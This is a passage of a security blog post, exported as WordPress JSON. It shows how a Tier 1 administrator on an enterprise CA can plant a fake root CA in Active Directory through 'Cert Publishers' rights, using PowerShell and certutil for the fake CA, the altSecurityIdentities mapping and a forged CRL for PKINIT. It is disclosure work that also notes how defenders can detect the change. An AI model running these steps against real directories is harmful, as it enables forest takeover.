{"id":1247,"date":"2025-03-17T17:34:41","date_gmt":"2025-03-17T16:34:41","guid":{"rendered":"https:\/\/blog.chrisse.se\/?p=1247"},"modified":"2025-03-17T17:34:41","modified_gmt":"2025-03-17T16:34:41","slug":"when-your-enterprise-pki-becomes-one-of-your-enemies-part-6","status":"publish","type":"post","link":"https:\/\/blog.chrisse.se\/?p=1247","title":{"rendered":"When your Enterprise PKI becomes one of your enemies (Part 6)"},"content":{"rendered":"\n<p><strong>Create, distribute and enforce trust of a fake CA from T1 &#8211; PKINIT \u2013 altSecurityIdentities + AMA + Cert Publishers<\/strong><\/p>\n\n\n\n<p>Let&#8217;s assume that &#8216;Issuing CA 2&#8217; here is managed from T1 and not trusted in &#8216;NTAuth&#8217; &#8211; that should not be a problem, or should it?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"559\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2-1024x559.png\" alt=\"\" class=\"wp-image-1237\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2-1024x559.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2-300x164.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2-768x419.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2.png 1420w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>In this scenario a Tier 1 administrator could log on to &#8216;Issuing CA 2&#8217;, become SYSTEM and act in the machine&#8217;s security context.<br>Enterprise CAs are automatically added to the &#8216;Cert Publishers&#8217; group, and that group is always given &#8216;Full Control&#8217; over an Enterprise CA&#8217;s &#8216;certificationAuthority&#8217; object within &#8216;CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com&#8217;<\/p>\n\n\n\n<figure class=\"wp-block-image 
size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"632\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub-1024x632.png\" alt=\"\" class=\"wp-image-1238\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub-1024x632.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub-300x185.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub-768x474.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub.png 1417w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>This is unfortunately hardcoded into the installation of an Enterprise CA &#8211; but now to the interesting part: what can you do if you&#8217;re a member of &#8216;Cert Publishers&#8217;?<br><br>Well, let&#8217;s create our own fake CA and a leaf certificate containing the AMA issuance policy OID:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">CreateFakeCA and Leaf without CRL<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Import-Module -Name CertRequestTools\n$CertPolicies = New-CertificatePoliciesExtension -Oid &quot;2.5.29.32.0&quot; \n$AmaExtension = New-CertificatePoliciesExtension -Oid &quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;\n\n$signer = New-SelfSignedCertificate -KeyExportPolicy Exportable `\n -CertStoreLocation Cert:\\CurrentUser\\My `\n -Subject &quot;CN=Chrisse Root CA,DC=chrisse,DC=com&quot; `\n -NotAfter 
(Get-Date).AddYears(1) `\n -HashAlgorithm sha256 `\n -KeyusageProperty All `\n -KeyUsage CertSign, CRLSign, DigitalSignature `\n -Extension $CertPolicies `\n -TextExtension @('2.5.29.37={text}1.3.6.1.4.1.311.10.12.1', '2.5.29.19={text}CA=1&amp;pathlength=3')\n\n $params = @{\n    Type = 'Custom'\n    Subject = 'CN=DEMO5 - fakecaso1'\n    #KeySpec = 'Signature'\n    KeyExportPolicy = 'Exportable'\n    KeyLength = 2048\n    HashAlgorithm = 'sha256'\n    NotAfter = (Get-Date).AddMonths(10)\n    CertStoreLocation = 'Cert:\\CurrentUser\\My'\n    Signer = $signer\n    TextExtension = @(\n     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',\n     '2.5.29.17={text}upn=caso@nttest.chrisse.com')\n    Extension =  $AmaExtension\n}\nNew-SelfSignedCertificate @params\nExport-Certificate -Cert $signer -FilePath FakeCA.cer\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #6F42C1\">Import-Module<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name CertRequestTools<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CertPolicies <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: 
#24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;2.5.29.32.0&quot;<\/span><span style=\"color: #24292EFF\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$AmaExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-SelfSignedCertificate<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">KeyExportPolicy Exportable <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">CertStoreLocation Cert:\\CurrentUser\\My <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Subject <\/span><span style=\"color: #22863A\">&quot;CN=Chrisse Root CA,DC=chrisse,DC=com&quot;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">NotAfter (<\/span><span 
style=\"color: #6F42C1\">Get-Date<\/span><span style=\"color: #24292EFF\">).AddYears(<\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">) <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">HashAlgorithm sha256 <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">KeyusageProperty All <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">KeyUsage CertSign<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> CRLSign<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> DigitalSignature <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Extension $CertPolicies <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">TextExtension <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">(<\/span><span style=\"color: #22863A\">&#39;2.5.29.37={text}1.3.6.1.4.1.311.10.12.1&#39;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;2.5.29.19={text}CA=1&amp;pathlength=3&#39;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> $params <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> 
<\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Type <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Custom&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Subject <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;CN=DEMO5 - fakecaso1&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #C2C3C5\">#KeySpec = &#39;Signature&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyExportPolicy <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Exportable&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyLength <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">2048<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    HashAlgorithm <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;sha256&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    NotAfter <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> (<\/span><span style=\"color: #6F42C1\">Get-Date<\/span><span style=\"color: #24292EFF\">).AddMonths(<\/span><span style=\"color: #1976D2\">10<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    CertStoreLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Cert:\\CurrentUser\\My&#39;<\/span><\/span>\n<span class=\"line\"><span 
style=\"color: #24292EFF\">    Signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $signer<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    TextExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.37={text}1.3.6.1.5.5.7.3.2&#39;<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.17={text}upn=caso@nttest.chrisse.com&#39;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Extension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\">  $AmaExtension<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">New-SelfSignedCertificate<\/span><span style=\"color: #24292EFF\"> @params<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">Export-Certificate<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Cert $signer <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">FilePath FakeCA.cer<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Find any user within the forest where you can write to the &#8216;altSecurityIdentities&#8217; attribute<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span 
style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Set-AltSecurityIdentities<\/span><span role=\"button\" tabindex=\"0\" data-code=\"$cert  = ls Cert:\\CurrentUser\\my | where { $_.subject -eq &quot;CN=DEMO5 - fakecaso1&quot; }\n.\\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">$cert  <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> ls Cert:\\CurrentUser\\my <\/span><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">where<\/span><span style=\"color: #24292EFF\"> { <\/span><span style=\"color: #1976D2\">$_.subject<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;CN=DEMO5 - fakecaso1&quot;<\/span><span style=\"color: #24292EFF\"> }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">.<\/span><span style=\"color: 
#6F42C1\">\\Set-AltSecurityIdentities.ps1<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Identity CASO <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">MappingType IssuerSerialNumber <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Certificate $cert<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>So we now have a CA &#8216;CN=Chrisse Root CA,DC=chrisse,DC=com&#8217; and a certificate issued by that CA, &#8220;CN=DEMO5 &#8211; fakecaso3&#8221;, with the AMA issuance OID. There is a reason why the CA is named &#8220;CN=Chrisse Root CA,DC=chrisse,DC=com&#8221; (the name of an already existing root CA within the forest), and that is because of how certutil -dspublish handles the CA certificate.<br>So now let&#8217;s become SYSTEM on &#8216;Issuing CA 2&#8217;, which is by default a member of the &#8216;Cert Publishers&#8217; group, and add the CA certificate to Active Directory using certutil.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"certutil -dspublish -f .\\FakeCA.cer rootca\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292eff\">certutil -dspublish -f .\\FakeCA.cer rootca<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"844\" height=\"133\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/certutil-2.png\" alt=\"\" class=\"wp-image-1251\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/certutil-2.png 844w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/certutil-2-300x47.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/certutil-2-768x121.png 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p><br>Oops &#8211; that worked &#8211; so what happened? Basically, as certutil was running as SYSTEM on &#8216;Issuing CA 2&#8217;, which is a member of &#8216;Cert Publishers&#8217;, it had the ability to write the certificate of our &#8216;Fake CA&#8217; into the &#8216;cACertificate&#8217; attribute of the existing object &#8216;<br>CN=Chrisse Root CA,CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com&#8217;, because the subject matched &#8216;CN=Chrisse Root CA,DC=chrisse,DC=com&#8217;.<br>Our &#8216;Fake CA&#8217; certificate is now the second value added to the &#8216;cACertificate&#8217; attribute. From the defender&#8217;s side, this is an ordinary directory modification: with Directory Service Changes auditing enabled on the objects under &#8216;CN=Certification Authorities&#8217;, the write shows up as an object-modified event (event ID 5136) naming the &#8216;cACertificate&#8217; attribute, which is the place to look for it.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"822\" height=\"481\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCACertificate.png\" alt=\"\" class=\"wp-image-1253\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCACertificate.png 822w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCACertificate-300x176.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCACertificate-768x449.png 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>Now the interesting part &#8211; will all domain-joined clients within this forest now trust our &#8216;Fake CA&#8217;?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"496\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC-1024x496.png\" alt=\"\" class=\"wp-image-1254\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC-1024x496.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC-300x145.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC-768x372.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC.png 1474w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>Oops again, yes, even on Domain Controllers (DCs) \/ Key Distribution Centers (KDCs). So what can we do now? The leaf certificate we issued above with the AMA issuance policy OID &#8211; can we use it to perform PKINIT and take over the forest?<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"939\" height=\"658\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/NoCDP.png\" alt=\"\" class=\"wp-image-1255\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/NoCDP.png 939w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/NoCDP-300x210.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/NoCDP-768x538.png 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>Nope &#8211; not possible (at least not yet \ud83d\ude42 ) &#8211; even though the certificate doesn&#8217;t have a CDP extension at all, the KDC demands that every certificate used for PKINIT has a valid CDP or OCSP. 
What if we fix that as well?<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Create and Sign CRL with Fake CA<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Import-Module -Name CertRequestTools\n$Crl = [CERTENROLLlib.CX509CertificateRevocationListClass]::new()\n$Crl.Initialize()\n$dn = [CERTENROLLlib.CX500DistinguishedNameClass]::new()\n$dn.Encode(&quot;CN=Chrisse Root CA,DC=chrisse,DC=com&quot;, [CERTENROLLlib.x500NameFlags]::XCN_CERT_X500_NAME_STR)\n$Crl.Issuer = $dn\n$Crl.CRLNumber([CERTENROLLlib.EncodingType]::XCN_CRYPT_STRING_HEX) = &quot;0001&quot;\n$signer = [CERTENROLLlib.CSignerCertificateClass]::new()\n# Note the thumbprint below is the 'Fake CA' certificate with the private key available \n$signer.Initialize($false,[CERTENROLLlib.X509PrivateKeyVerify]::VerifyNone, [CERTENROLLlib.EncodingType]::XCN_CRYPT_STRING_HEXRAW, &quot;D948F2E5585FD3C7802263DAED9722E67315FA02&quot;)\n$Crl.SignerCertificate = $signer\n$Crl.Encode()\n\n[System.IO.File]::WriteAllBytes(&quot;fakeca.crl&quot;, [System.Convert]::FromBase64String($Crl.RawData()))\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path 
class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #6F42C1\">Import-Module<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name CertRequestTools<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.CX509CertificateRevocationListClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.Initialize()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$dn <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.CX500DistinguishedNameClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$dn.Encode(<\/span><span style=\"color: #22863A\">&quot;CN=Chrisse Root CA,DC=chrisse,DC=com&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.x500NameFlags<\/span><span style=\"color: #24292EFF\">]::XCN_CERT_X500_NAME_STR)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.Issuer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $dn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.CRLNumber([<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.EncodingType<\/span><span style=\"color: #24292EFF\">]::XCN_CRYPT_STRING_HEX) <\/span><span 
style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;0001&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.CSignerCertificateClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># Note the thumbprint below is the &#39;Fake CA&#39; certificate with the private key available <\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$signer.Initialize(<\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\">[<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.X509PrivateKeyVerify<\/span><span style=\"color: #24292EFF\">]::VerifyNone<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.EncodingType<\/span><span style=\"color: #24292EFF\">]::XCN_CRYPT_STRING_HEXRAW<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: 